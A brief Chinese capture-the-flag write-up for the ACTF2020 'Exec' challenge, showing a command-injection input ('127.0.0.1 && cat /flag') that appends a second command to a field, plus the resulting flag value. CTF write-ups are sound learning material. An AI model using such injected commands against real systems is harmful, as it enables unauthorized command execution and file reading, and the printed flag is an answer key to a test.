[ACTF2020 新生赛]Exec

1.访问页面,为命令执行。
[ACTF2020 新生赛]Exec_第1张图片
2.发现可以执行命令。
[ACTF2020 新生赛]Exec_第2张图片

3.直接查看flag。

127.0.0.1 && cat /flag

flag{cf369253-09f4-4ff8-a1fb-97922cf87b06}

[ACTF2020 新生赛]Exec_第3张图片

你可能感兴趣的:(BUUCTF,web安全,安全性测试,安全)